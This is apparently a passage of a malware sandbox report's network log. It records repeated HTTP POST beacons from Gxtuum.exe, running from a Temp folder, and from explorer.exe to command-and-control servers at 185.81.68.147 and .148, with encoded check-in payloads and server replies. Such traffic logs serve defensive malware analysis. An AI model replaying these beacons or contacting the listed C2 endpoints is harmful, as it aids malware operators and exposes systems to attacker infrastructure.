                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                97192.168.2.549968185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:31.140907049 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:31.260750055 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:32.824966908 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:31 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                98192.168.2.549974185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:32.630582094 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:33.944586992 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:33 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                99192.168.2.549975185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:32.809621096 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:34.230974913 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:33 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                100192.168.2.549976185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:33.047070026 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:33.166940928 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:34.673382998 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:33 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                101192.168.2.549982185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:34.906435966 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:35.026442051 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:36.342917919 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:35 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                102192.168.2.549983185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:35.622526884 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:36.964060068 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:36 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                103192.168.2.549984185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:35.891947985 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:37.241774082 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:36 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                104192.168.2.549985185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:36.585829020 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:36.705821037 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:38.031996012 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:37 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                105192.168.2.549991185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:38.268978119 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:38.388994932 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:39.891872883 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:38 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                106192.168.2.549992185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:38.763472080 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:40.100713015 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:39 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                107192.168.2.549993185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:39.070377111 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:40.413897038 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:39 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                108192.168.2.549999185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:40.125686884 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:40.245870113 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:41.751837969 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:40 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                109192.168.2.550003185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:41.985169888 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:42.105762005 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:43.419528961 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:42 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                110192.168.2.550002185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:42.011835098 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:43.320122957 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:42 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                111192.168.2.550007185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:42.136322021 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:43.507548094 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:42 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                112192.168.2.550008185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:43.660439014 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:43.783406019 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:45.263254881 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:44 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                113192.168.2.550014185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:45.191076994 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:46.514014006 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:45 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                114192.168.2.550015185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:45.361780882 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:46.694461107 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:46 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                115192.168.2.550016185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:45.500108004 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:45.621090889 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:47.138717890 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:46 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                116192.168.2.550017185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:47.377542019 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:47.497476101 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:49.000658035 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:48 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                117192.168.2.550023185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:48.211309910 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
